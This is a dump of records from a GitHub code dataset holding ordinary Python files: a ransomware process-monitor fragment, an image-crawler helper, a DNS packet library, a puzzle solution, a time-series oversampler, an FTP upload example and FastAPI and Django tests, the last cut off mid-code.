Exception in monitoring network activity')\r\n print(ex)\r\n\r\n\r\nif __name__ == '__main__':\r\n t1 = threading.Thread(target=monitor_process)\r\n t2 = threading.Thread(target=monitor_resource_activity)\r\n t3 = threading.Thread(target=monitor_network_activity)\r\n\r\n t1.start()\r\n t2.start()\r\n t3.start()\r\n\r\n t1.join()\r\n t2.join()\r\n t3.join()\r\n","repo_name":"tarunchand/RansomCombatant","sub_path":"process_monitor.py","file_name":"process_monitor.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"1839964466","text":"from lxml import etree\r\nimport requests\r\nimport re\r\n\r\n\r\nclass PicTools(object):\r\n def __init__(self):\r\n self.headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\r\n }\r\n # 匹配任何不可见字符,包括空格、制表符、换页符等等\r\n self.pattern_space = re.compile('\\s')\r\n\r\n # 将url转为redis的key(将:转为@)\r\n def convert_url2key(self, url):\r\n return url.replace(':', '@@@')\r\n\r\n # 取后缀,判断是不是图片,取最后一个点后面就是后缀,lower将字符串全变成小写\r\n def get_postfix(self, url):\r\n start = url.rfind('.') + 1\r\n if start:\r\n return url[start:].lower()\r\n return ''\r\n\r\n def extract_html(self, url):\r\n '''\r\n ①解决编码问题, 通过try exception 获取html源码。\r\n ②加入Requests Headers\r\n :param url:\r\n :return: [html, after_url]\r\n '''\r\n # isinstance判断变量是否是str这个类型\r\n if not isinstance(url, str):\r\n url = url.decode()\r\n ori = requests.get(url, headers=self.headers)\r\n b_html = ori.content\r\n after_url = ori.url\r\n try:\r\n html = b_html.decode(encoding='utf-8')\r\n except:\r\n try:\r\n html = b_html.decode(encoding='gbk')\r\n except:\r\n html = ori.text\r\n return [html, after_url]\r\n\r\n # 取域名,http://占7个字符,https://占8个字符\r\n def get_hosts(self, url):\r\n try:\r\n end = url.index('/', 8)\r\n # 返回域名\r\n return url[:end]\r\n except:\r\n return url\r\n\r\n # 将一个href转换成绝对链接,startswith判断是否以指定字符串开头,有些href是javascript脚本代码或#之类的链接\r\n def deal_relative_href(self, front_href, h):\r\n if isinstance(front_href, bytes):\r\n front_href = front_href.decode()\r\n exit_set = ('#', '', '/')\r\n if h.startswith('java') or (h in exit_set):\r\n return front_href\r\n is_https = h.startswith('https')\r\n\r\n if h.startswith('//'):\r\n if is_https:\r\n # h = 'https:' + h\r\n # print(h)\r\n # return h\r\n return 'https:' + h\r\n else:\r\n # h = 'http:' + h\r\n # print(h)\r\n # return h\r\n return 'http:' + h\r\n # return 'http:' + h\r\n if self.pattern_space.search(h):\r\n return front_href\r\n if not h.startswith('http'):\r\n return front_href + h\r\n else:\r\n return h\r\n","repo_name":"xuxin19941214/quanwang-tupian","sub_path":"全网爬虫图片/PicTools.py","file_name":"PicTools.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18154618033","text":"import sys, struct, os.path, time, json, ipaddress, random, codecs\nfrom socket import*\nfrom threading import Thread\n\n# source = https://stackoverflow.com/questions/54278329/how-to-parse-dns-question-field-with-python-raw-sockets\ndef data_packet_dns(data):\n tuple_data_dns = struct.unpack('!HHHHHH', data[:12])\n identification = tuple_data_dns[0]\n flags = tuple_data_dns[1] \n queries = tuple_data_dns[2]\n response = tuple_data_dns[3]\n authority = tuple_data_dns[4]\n additional = tuple_data_dns[5]\n qr = (flags & 32768) != 0\n opcode = (flags & 30720 ) >> 11\n aa = (flags & 1024) != 0\n tc = 
(flags & 512) != 0\n rd = (flags & 256) != 0\n ra = (flags & 128) != 0\n z = (flags & 112) >> 4\n rcode = flags & 15\n return queries, response, authority, additional, rcode\n \ndef constructQuery(hostname, type, clas,recurse):#1 means recursion desired\n\tif(recurse == 1):\n\t\tquery = bytes(\"\\x08\\x08\" + \"\\x01\\x00\" + \"\\x00\\x01\" + \"\\x00\\x00\" + \"\\x00\\x00\" + \"\\x00\\x00\", 'utf-8')\n\telse:\n\t\tquery = bytes(\"\\x08\\x08\" + \"\\x00\\x00\" + \"\\x00\\x01\" + \"\\x00\\x00\" + \"\\x00\\x00\" + \"\\x00\\x00\", 'utf-8')\n\td = bytes(\"\", 'utf-8')\n\n\tfor a in hostname.split('.'):\n\t\td += struct.pack(\"!b\" + str(len(a)) + \"s\", len(a), bytes(a, \"utf-8\"))\n\n\tquery = query + d + bytes(\"\\x00\", 'utf-8') #terminate domain with zero len\n\tif type=='A'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x01\" + \"\\x00\\x01\", 'utf-8') #type A, class IN\n\telif type=='AAAA'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x1c\" + \"\\x00\\x01\", 'utf-8') #type AAAA, class IN\n\telif type=='NS'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x02\" + \"\\x00\\x01\", 'utf-8') #type NS, class IN\n\telif type=='MX'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x0f\" + \"\\x00\\x01\", 'utf-8') #type MX, class IN\n\telif type=='CNAME'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x05\" + \"\\x00\\x01\", 'utf-8') #type CNAME, class IN\n\telif type=='SOA'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x06\" + \"\\x00\\x01\", 'utf-8') #type SOA, class IN\n\telif type=='TXT'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x10\" + \"\\x00\\x01\", 'utf-8') #type TXT, class IN\n\telif type=='PTR'and clas==\"IN\":\n\t\tquery = query + bytes(\"\\x00\\x0c\" + \"\\x00\\x01\", 'utf-8') #type PTR, class IN\n\treturn query\n\ndef str_from_pointer(response, p):\n\ti = 0\n\twhile(response[i]!=192 and response[i+1]!=12):#start of answer\n\t\tstart = i+1\n\t\ti+=1\n\t\t\n\tres = \"\"\n\ti = 0\n\tif p < start:\n\t\tstop = len(response)-p\n\telse:\n\t\tlength = response[p-1]\n\t\tstop = p+length-1\n\t\t\n\twhile (p < stop):\n\t\tsize = response[p]\n\t\tif(size == 192):\n\t\t\tres += str_from_pointer(response, response[p+1])\n\t\t\tp+=1\n\t\t\tres += \".\"\n\t\t\tcontinue\n\t\tif(size == 0):\n\t\t\tbreak\n\t\tfor j in range(1,size+1):\n\t\t\tres += chr(response[p+j])\n\t\tres += \".\"\n\t\tp += size+1\n\treturn res\n\ndef get_ipv4(response,start):\n\t#name\n\tres = \"\"\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\n\tstart += 12 #points to start of ip address\n\tip = response[start:start+4]\n\tipv4 = \"\"\n\tfor j in range(0,4):\n\t\tipv4 += str(ip[j])\n\t\tif(j != 3):\n\t\t\tipv4 += \".\"\n\treturn res,ipv4\n\ndef get_ipv6(response,start):\n\t#name\n\tres = \"\"\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tbeg = start+12\n\t#last 16 bytes contains ip address\n\tip = response[beg:beg+16]\n\tipv6 = \"\"\n\tfor i in range(0,16,2):\n\t\ta = str(hex(ip[i])).split('0x',1)[1]\n\t\tb = str(hex(ip[i+1])).split('0x',1)[1]\n\t\tif(len(b) < 2):\n\t\t\tb = \"0\"+ b\n\t\tipv6 += a+b\n\t\tif(i != 14):\n\t\t\tipv6 += \":\"\n\t#ipv6 has ip address\n\treturn res,ipv6\t\n\t\t\ndef get_NS(response,start):#also same for CNAME\n\t#nameserver\n\tres=\"\";ns=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\n\tstart = start+12\n\tns = str_from_pointer(response, start)\t\t\t\n\treturn res[:-1],ns[:-1]\n\ndef 
get_MX(response,start):\n\t#nameserver\n\tres=\"\";mx=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\n\ta = response[start+12]\n\tb = response[start+13]\n\tpreference = int(a)*16*16 + int(b)\n\tstart = start+14\n\tfor i in range(start,start+length-2):\n\t\tx = response[i]\n\t\tif x == 192:\n\t\t\tmx += str_from_pointer(response, response[i+1])\n\t\t\ti+=1\n\t\telif x in range(0, 16):\n\t\t\tmx += \".\"\n\t\telse:\n\t\t\tmx += chr(response[i])\n\treturn res[:-1],str(preference)+\" \"+mx[1:-1]\n\ndef get_TXT(response,start):#also same for CNAME\n\tres=\"\";txt=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tstart = start+12\n\ttxt = str_from_pointer(response, start)\t\n\treturn res[:-1],txt[:-1]\n\ndef get_time(response,start):\n\tt1 = response[start]; t2 = response[start+1]\n\tt3 = response[start+2]; t4 = response[start+3]\n\tttl = int(t1)*(16**6) + int(t2)*(16**4) + int(t3)*(16**2)+int(t4)\n\treturn ttl\n\ndef get_SOA(response,start):\n\tres=\"\";\n\tif(response[start] == 192):\n\t\tres += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\t\t\n\tstart = start+12\n\tpns = \"\" #primary name server\n\tram = \"\" #responsible authority's mailbox\n\tmt = get_time(response,start+length-4)#minimum ttl\n\tel = get_time(response,start+length-8)#expire limit\n\trti = get_time(response,start+length-12)#retry interval\n\trfi = get_time(response,start+length-16)#refresh interval\n\tsn = get_time(response,start+length-20)#serial number\n\tfor i in range(start,start+length-20):\n\t\tx = response[i]\n\t\tif x == 192:\n\t\t\tpns += \".\"+str_from_pointer(response, response[i+1])\n\t\t\ti+=2\n\t\t\tbreak\n\t\telif x in range(0, 16):\n\t\t\tpns += \".\"\n\t\telse:\n\t\t\tpns += chr(response[i])\n\n\tfor j in range(i,start+length-20):\n\t\tx = response[j]\n\t\tif x == 192:\n\t\t\tram += \".\"+str_from_pointer(response, response[j+1])\n\t\t\tbreak\n\t\telif x in range(0, 16):\n\t\t\tram += \".\"\n\t\telse:\n\t\t\tram += chr(response[j])\n\treturn res[:-1],pns[1:-1],ram[1:-1],sn,rfi,rti,el,mt\n\ndef get_PTR(response,start):\n\taddr=\"\";name=\"\";\n\tif(response[start] == 192):\n\t\taddr += str_from_pointer(response, response[start+1])\n\t\t\t\t\t\n\tlength = response[start+11]\t\t\n\tstart = start+12\n\tfor i in range(start,start+length):\n\t\tx = response[i]\n\t\tif x == 192:\n\t\t\tname += str_from_pointer(response, response[i+1])\n\t\t\ti+=1\n\t\telif x in range(0, 16):\n\t\t\tname += \".\"\n\t\telse:\n\t\t\tname += chr(response[i])\n\treturn addr[1:],name[1:]\n\ndef get_query_details(query):\n\tlength = len(query)\n\tstart = 12\n\tst = \"\"\n\twhile start < length:\n\t\tsize = query[start]\n\t\tif(size == 0):\n\t\t\tbreak\n\t\tfor j in range(1,size+1):\n\t\t\tst += chr(query[start+j])\n\t\tst += \".\"\n\t\tstart += size+1\n\ttype = query[start+2]\n\tclas = query[start+4]\n\tstart += 5\n\treturn st[:len(st) - 1] ,type, clas, start\n","repo_name":"amodn08/CN-project","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26659128477","text":"# Questions Marks\n# Have the function QuestionsMarks(str) take the str string parameter, which will contain single digit numbers, letters, and question marks, and check if there are exactly 3 question marks between every pair of two 
numbers that add up to 10. If so, then your program should return the string true, otherwise it should return the string false. If there aren't any two numbers that add up to 10 in the string, then your program should return false as well.\n# For example: if str is \"arrb6???4xxbl5???eee5\" then your program should return true because there are exactly 3 question marks between 6 and 4, and 3 question marks between 5 and 5 at the end of the string.\ndef QuestionsMarks(strParam):\n a = -1\n b = -1\n c = 0\n count = 0\n lst = list(strParam)\n while count != len(lst):\n for i in lst:\n count = count + 1\n if i.isnumeric() and c==1:\n c = c + 1\n b = lst.index(i)\n if i.isnumeric() and c==0:\n c = c + 1\n a = lst.index(i)\n if c==2 and (int(lst[a])+int(lst[b]))==10:\n c=0\n d = a + 1\n lst1 = lst[d:b]\n charCount = 0\n for s in lst1:\n charCount += s.count(\"?\")\n if charCount == 3:\n return \"true\"\n return \"false\"\n\nprint(QuestionsMarks(input()))","repo_name":"ehsanshaikh/python_cb_hr_practice","sub_path":"4-Question_Marks.py","file_name":"4-Question_Marks.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23696997257","text":"import pytest\nfrom fastapi.testclient import TestClient\n\nfrom main import app\n\nquestionanswer = {\n \"question\": \"What kind of bear is best?\",\n \"answers\": {'A': \"That's a ridiculous question.\",\n 'B': \"Black bear\"},\n\n \"correctAnswer\": 'B'\n}\n\nclient = TestClient(app)\n\n\n@pytest.mark.asyncio\nasync def test_should_create_questionanswer():\n response = client.post(\"/question\", json=questionanswer)\n assert response.status_code == 200\n assert response.json()['data'][0]['question'] == 'What kind of bear is best?'\n\n\n@pytest.mark.asyncio\nasync def test_should_return_all_questionaswers():\n response = client.get(\"/question\")\n assert response.status_code == 200\n\n\n@pytest.mark.asyncio\nasync def test_should_return_http_code_400_and_invalid_question_id():\n response = client.get(\"/question/123\")\n assert response.status_code == 400\n assert response.json()['detail'] == 'Invalid question id'\n\n\n@pytest.mark.asyncio\nasync def test_should_not_find_question_by_id():\n question_id = \"624ed6ac8a361b879616f878\"\n response = client.get(f\"/question/{question_id}\")\n assert response.status_code == 404\n assert response.json()['detail'] == f\"Could not find question with id: {question_id}.\"\n","repo_name":"Wonziak/PollingTool","sub_path":"test/Routers/test_question_router.py","file_name":"test_question_router.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13568246110","text":"from sklearn.neighbors import NearestNeighbors\nfrom scipy.ndimage import uniform_filter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys, math, io, os\nfrom collections import Counter\n\n\nclass ts_oversampler:\n '''\n timeseries_oversampler.ts_oversampler::Class containing the building blocks for \n the oversampling algorithm, allowing for fine-grained control when needed\n '''\n def generate_new_lengths(self, timeseries, ts_num=1, window_size=6, X=10, fixed_len=True, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().generate_new_lengths::Generate the lengths for each of the synthetic timeseries\n \n :param timeseries: list\n timeseries given as a list\n :param ts_num: int\n number of synthetic timeseries lengths 
to be produced\n        :param window_size: int\n            network hyperparameters\n        :param X: int\n            boundary for uniform randomization of the generated lengths\n        :param fixed_len: bool\n            don't randomize the new lengths if True\n        :param seed: int\n            random seed\n        \n        :return: list\n            new lengths\n        '''\n        np.random.seed(seed)\n        window_ts_lengths = [len(ts) for ts in timeseries]\n\n        windows = [[] for _ in range(int(max(window_ts_lengths)/window_size) + 1)]\n        for ts_len in window_ts_lengths:\n            window_pos = int(ts_len/window_size)\n            windows[window_pos].append(ts_len)\n\n        # compute the percentage of total timeseries in each window\n        tot_ts = len(timeseries)\n        prob = [len(window)/tot_ts for window in windows]\n\n        # generate random lengths based on percentages computed above; new_lengths contains pairs in the form: (reference_ts_index_within_window, new_length)\n        new_lengths = []\n        for rand_window in np.random.choice(list(range(len(prob))), ts_num, p=prob):\n            # choose a random reference ts within the chosen time window\n            ts_in_window = windows[rand_window]\n            reference_ts_pos = np.random.randint(len(ts_in_window))\n            new_len = ts_in_window[reference_ts_pos]\n            if not fixed_len:\n                new_len += np.random.uniform(-X, X)\n                # length cannot be lower or higher than this window bounds\n                if new_len < rand_window*window_size:\n                    new_len = rand_window*window_size\n                elif new_len >= (rand_window + 1)*window_size:\n                    new_len = (rand_window + 1)*window_size - 1\n\n            new_lengths.append((reference_ts_pos, int(new_len)))\n\n        return new_lengths\n\n    def random_point_in_d_ball(self, point, radius=-1, seed=1):\n        ''' \n        timeseries_oversampler.ts_oversampler().random_point_in_d_ball::Muller algorithm for sampling a random point in a ball of radius d\n        \n        :param point: list\n            point coordinates given as a list\n        :param radius: int\n            radius in which the point is sampled; if -1, the point will be sampled with a uniform distribution\n        :param seed: int\n            random seed\n        \n        :return: list\n            sampled point\n        '''\n        np.random.seed(seed)\n        # Muller algorithm\n        d = len(point)\n        u = np.random.normal(0, 1, d) # an array of d normally distributed random variables\n        norm = np.sum(u**2)**(0.5)\n        if radius > -1:\n            x = radius * u / norm # r*u/norm\n        else:\n            r = np.random.uniform()**(1.0/d) # radius*np.random.uniform()**(1.0/d)\n            x = r * u / norm\n\n        return [x[i]+v for i, v in enumerate(point)]\n\n    def get_centroid(self, points):\n        ''' \n        timeseries_oversampler.ts_oversampler().get_centroid::Get the centroid of a list of points\n        \n        :param points: list\n            points for which the centroid has to be found\n        \n        :return: list\n            centroid point\n        '''\n        centroid = [[] for _ in points[0]]\n        l = len(points)\n\n        for point in points:\n            for axis, val in enumerate(point):\n                centroid[axis].append(val)\n\n        return [sum(values)/l for values in centroid]\n\n    def pad_timeseries(self, timeseries, resulting_length):\n        ''' \n        timeseries_oversampler.ts_oversampler().pad_timeseries::Pad the synthetic timeseries to a target length\n        \n        :param timeseries: list\n            timeseries to pad\n        :param resulting_length: int\n            target length\n\n        :return: list\n            padded timeseries\n        '''\n        if len(timeseries) == resulting_length:\n            return timeseries\n        iterations = abs(len(timeseries) - resulting_length)\n        padded_ts = timeseries\n        for i in range(iterations):\n            # Replicate first element\n            if i % 2 == 0:\n                padded_ts = [padded_ts[0]] + padded_ts\n            # Replicate last element\n            else:\n                padded_ts = padded_ts + [padded_ts[-1]]\n        return padded_ts\n    \n    def oversample_timeseries(self, timeseries, 
window_size=60, ts_num=1, X=8, normal_sd=3.33, sliding_window=3, d=0.01, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().oversample_timeseries::Obtain new synthetic timeseries from a list of timeseries\n \n :param timeseries: list\n timeseries to oversample\n :param window_size: int\n window size\n :param ts_num: int\n number of synthetic timeseries to produce\n :param X: int\n boundary for uniform randomization of the generated lengths\n :param normal_sd: int\n standard deviation for normal distribution\n :param sliding_window: int\n sliding window size\n :param d: int\n radius for Muller algorithm\n :param seed: int\n random seed\n\n :return: list\n synthetic timeseries\n :return: list\n synthetic timeseries lengths\n '''\n np.random.seed(seed)\n new_lengths = sorted(self.generate_new_lengths(timeseries, ts_num=ts_num, window_size=window_size, X=X, seed=seed))\n # sort time series based on timeseries lengths\n timeseries.sort(key=len)\n\n synthetic_timeseries = []\n\n for w in range(int(len(timeseries[-1]) / window_size) + 1):\n window_ts = [ts for ts in timeseries if w * window_size <= len(ts) < (w + 1) * window_size] # original timeseries in this window\n window_ts_lengths = [len(ts) for ts in window_ts] # original timeseries lenghts\n window_new_lengths = []\n window_ts_references = []\n\n for ts_len in new_lengths: # for each new synthetic time series get thos in this window\n if w * window_size <= ts_len[1] < (w + 1) * window_size:\n window_ts_references.append(ts_len[0])\n window_new_lengths.append(ts_len[1])\n\n # skip windows where there are no reference timeseries and any new timeseries to create (second check should be always false if there are no reference ts)\n if len(window_ts) > 0 and len(window_new_lengths) > 0:\n # in the first snapshot for each reference ts get a random neighbour and compute a third point between these two\n first_snapshot_points = [ts[0] for ts in window_ts]\n\n # ----- COMPUTE NEW TIMESERIES STARTING POINTS -----\n\n # array with starting points for each new timeseries to create\n starting_points = [None for _ in window_new_lengths]\n\n # for each reference timeseries assign its first point to its paired synthetic timeseries\n for i, _ in enumerate(window_ts_lengths):\n for j, pos in enumerate(window_ts_references):\n if pos == i:\n starting_points[j] = first_snapshot_points[i]\n\n # ----- GENERATE POINTS FOR NEW TIMESERIES -----\n\n # values for new ts based on their reference ts\n generated_points = [[window_ts[window_ts_references[i]][0]] for i, _ in enumerate(window_new_lengths)]\n # value of new ts starting from the chosen starter\n new_ts = [[starting_points[i]] for i, _ in enumerate(window_new_lengths)]\n\n for snapshot in range(1, len(window_ts[-1])):\n # all values from all the timeseries which have a value in this position\n points = [ts[snapshot] for ts in window_ts if len(ts) > snapshot]\n\n for ts_pos, ts_length in enumerate(window_new_lengths):\n if snapshot < ts_length:\n # reference ts for this new ts\n reference_ts = window_ts[window_ts_references[ts_pos]]\n\n # pick a reference value from reference ts with normal distribution around snapshot (both from past or from future)\n pos = int(np.random.normal(snapshot, normal_sd, 1)[0])\n if pos < 0:\n pos *= -1\n elif pos >= len(reference_ts):\n pos -= pos - (len(reference_ts) - 1)\n reference_ts_value = reference_ts[pos]\n\n # sample a point around the randomly chosen one\n dball_point = self.random_point_in_d_ball(reference_ts_value, d, seed=seed)\n # add the difference between 
this new point and the last generated to the actual new ts\n new_point = [round(new_ts[ts_pos][-1][ax]+(dball_point[ax]-generated_points[ts_pos][-1][ax]), 4) for ax, _ in enumerate(dball_point)]\n\n new_ts[ts_pos].append(new_point)\n generated_points[ts_pos].append(dball_point)\n\n # ----- MOVING AVERAGE -----\n moving_averages = []\n for j in range(len(new_ts)):\n moving_averages.append([self.get_centroid(new_ts[j][i-sliding_window:i]) for i in range(sliding_window, len(new_ts[j]))])\n\n synthetic_timeseries.extend(moving_averages)\n\n return synthetic_timeseries, new_lengths\n\n def oversample_and_pad(self, src_data, class_to_oversample, ts_num=1, sl_wnd=3, seed=1):\n ''' \n timeseries_oversampler.ts_oversampler().oversample_and_pad::Obtain new synthetic timeseries from a list of timeseries\n \n :param src_data: list\n timeseries list to oversample\n :param class_to_oversample: int\n class integer label\n :param ts_num: int\n number of synthetic timeseries to produce\n :param sl_wnd: int\n sliding window size for the oversampling algorithm\n :param seed: int\n random seed\n\n :return: pandas DataFrame\n synthetic timeseries organized in a table with 'Values' (X) and 'Class' (y) columns\n '''\n synth_ts_list = []\n class_list = []\n \n new_ts, new_len = self.oversample_timeseries(src_data, ts_num=ts_num, sliding_window=sl_wnd, seed=seed)\n \n for i in range(ts_num): \n padded_ts = self.pad_timeseries(new_ts[i], new_len[i][1])\n synth_ts_list.append(padded_ts)\n class_list.append(class_to_oversample)\n \n data = [synth_ts_list, class_list]\n final_df = pd.DataFrame()\n final_df = final_df.append(data).T\n \n final_df.columns=['Values', 'Class']\n \n return final_df\n\ndef gather_and_preprocess_data(_src_df_name, type_labels):\n ''' \n timeseries_oversampler.gather_and_preprocess_data::Gather, preprocess the\n data and cache it\n \n :param _src_df_name: str\n filename of the csv file containing the raw data\n\n :return: pandas DataFrame\n preprocessed data in a DataFrame with 'Values' (X) and 'Class' (y)\n columns\n '''\n\n df = pd.read_csv(_src_df_name)\n \n df['Values'] = df['Values'].apply(lambda x: np.fromstring(x, dtype=float, sep=';'))\n i = 0\n class_i = 0\n \n class_values = pd.DataFrame(data=[df['ID_TimeSeries'], df[type_labels]]).T\n class_values.columns = ['ID_TimeSeries', type_labels]\n data = []\n shapes = []\n \n range_len = len(df['ID_TimeSeries'].unique())\n for k in range(range_len):\n shapes.append(df.iloc[k]['Values'].shape[0])\n \n minimum_shape = min(shapes)\n\n\n for _ in range(range_len):\n current_matrix = pd.DataFrame(data=[\n df.iloc[i]['Values'], df.iloc[i+1]['Values'], df.iloc[i+2][\n 'Values'], df.iloc[i+3]['Values']]\n ).T.to_numpy()[:minimum_shape,:].tolist()\n\n\n data.append([class_i//4, current_matrix, class_values.iloc[class_i][type_labels]])\n i += 4\n class_i += 4\n\n\n final_df = pd.DataFrame()\n final_df = final_df.append(data)\n final_df.columns=['ID_TimeSeries', 'Values', 'Class']\n del final_df['ID_TimeSeries']\n\n return final_df\n\n\n\ndef augment_ts_dataset(_src_df, _percentage=0, _merge_sets=True, _seed=1):\n ''' \n timeseries_oversampler.augment_ts_dataset::Obtain a new dataset with synthetic timeseries\n \n :param _src_df: pandas DataFrame\n dataset to augment\n :param _percentage: int\n percentage of augmentation, if set to 0 the service will just balance every class to the one with the highest cardinality\n :param _merge_sets: bool\n if True, the source DataFrame will be merged to the synthetic one\n :param _seed: int\n random seed\n\n 
:return: pandas DataFrame\n synthetic timeseries organized in a table with 'Values' (X) and 'Class' (y) columns\n '''\n oversampler = ts_oversampler()\n \n #_src_df = gather_and_preprocess_data(_src_df_name)\n data_list = []\n\n if _merge_sets:\n data_list.append(_src_df)\n\n counter = Counter(_src_df['Class'].tolist())\n _percentage += 100\n max_cardinality = counter.most_common()[0][1] * (_percentage/100) \n num_classes = len(counter)\n \n # Oversample class by class: this allows for keeping a \n # coherent trend between real and synthetic timeseries wrt each class\n for index in range(num_classes):\n current_class = counter.most_common()[index][0]\n current_aug = round(max_cardinality - counter.most_common()[index][1])\n \n current_class_to_augment_df = _src_df.loc[_src_df['Class'] == int(current_class)]\n \n print(\"Trying to augment class labeled \\\"{}\\\" by {} samples...\".format(\n current_class, current_aug))\n current_augmented_class = oversampler.\\\n oversample_and_pad(current_class_to_augment_df['Values'].tolist(\n ), current_class, ts_num=current_aug, seed=_seed)\n print(\"Class labeled \\\"{}\\\" augmented!\".format(current_class))\n\n data_list.append(current_augmented_class)\n\n augmented_df = pd.concat(data_list)\n augmented_df.reset_index()\n\n # Plot the histogram\n # Before\n fig = plt.figure(figsize=(12,8))\n plt.xlabel('Class', fontsize=20)\n plt.ylabel('Number of Samples', fontsize=20)\n arr = _src_df['Class'].array\n labels, counts = np.unique(arr, return_counts=True)\n plt.bar(labels, counts, align='center', edgecolor=\"black\")\n plt.gca().set_xticks(labels)\n\n # After\n fig = plt.figure(figsize=(12,8))\n plt.xlabel('Class', fontsize=20)\n plt.ylabel('Number of Samples', fontsize=20)\n arr = augmented_df['Class'].array.astype(int)\n labels, counts = np.unique(arr, return_counts=True)\n plt.bar(labels, counts, align='center', edgecolor=\"black\")\n plt.gca().set_xticks(labels)\n\n return augmented_df\n","repo_name":"andreafuschino/Time-series-Metric-Learning","sub_path":"timeseries_oversampler.py","file_name":"timeseries_oversampler.py","file_ext":"py","file_size_in_byte":15956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"30511802962","text":"# coding=utf-8\n\nimport ftplib\n\nf = ftplib.FTP('localhost')\nf.login('windard','windard')\n\n#以二进制格式上传\nlocalfile1 = open('demo.tar.gz','rb')\nf.storbinary('STOR demo.tar.gz',localfile1)\nlocalfile1.close()\n\n#以ASCII格式上传\nlocalfile2 = open('demo.txt','r')\nf.storlines('STOR demo.txt',localfile2)\nlocalfile2.close()\n\nf.quit()\n\n","repo_name":"windard/Python_Lib","sub_path":"code/ftplib_upload.py","file_name":"ftplib_upload.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"6352361389","text":"import shutil\nimport tempfile\nfrom http import HTTPStatus\n\nfrom django.conf import settings\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Comment, Post, User\n\nAPP_NAME = \"posts\"\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass FormTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create(username=\"test\")\n\n cls.post = Post.objects.create(\n text=\"Текст\",\n author=cls.user,\n )\n\n 
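# minimal valid GIF byte payload (GIF89a header plus one tiny frame) used below to exercise image upload\n        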
cls.post_image_text = \"Текст с картинкой\"\n cls.post_image_small_gif = (\n b\"\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00\"\n b\"\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\"\n b\"\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00\"\n b\"\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00\"\n b\"\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C\"\n b\"\\x0A\\x00\\x3B\"\n )\n\n cls.comment_text = \"Комментарий\"\n cls.comment_text_modified = \"Текст измененный\"\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.client = Client()\n self.client.force_login(FormTests.user)\n\n def entities_creation_post(self):\n count = Post.objects.count()\n\n image = SimpleUploadedFile(\n name=\"small.gif\",\n content=FormTests.post_image_small_gif,\n content_type=\"image/gif\",\n )\n\n response = self.client.post(\n reverse(f\"{APP_NAME}:post_create\"),\n data={\n \"text\": FormTests.post_image_text,\n \"image\": image,\n },\n follow=True,\n )\n\n self.assertEqual(Post.objects.count(), count + 1)\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n self.assertTrue(\n Post.objects.filter(\n text=FormTests.post_image_text,\n image=f\"{APP_NAME}/{image.name}\",\n ).exists()\n )\n\n def entities_creation_comment(self):\n count = Comment.objects.count()\n\n response = self.client.post(\n reverse(\n f\"{APP_NAME}:add_comment\", kwargs={\"pk\": FormTests.post.id}\n ),\n data={\n \"text\": FormTests.comment_text,\n },\n follow=True,\n )\n\n self.assertEqual(Comment.objects.count(), count + 1)\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n self.assertTrue(\n Comment.objects.filter(text=FormTests.comment_text).exists()\n )\n\n def test_entities_creation(self):\n \"\"\"\n Отправка валидной формы со страниц создания поста и комментария поста.\n \"\"\"\n self.entities_creation_post()\n self.entities_creation_comment()\n\n def entities_modification_post(self):\n response = self.client.post(\n reverse(\n f\"{APP_NAME}:post_update\", kwargs={\"pk\": FormTests.post.id}\n ),\n data={\n \"text\": FormTests.comment_text_modified,\n },\n follow=True,\n )\n\n 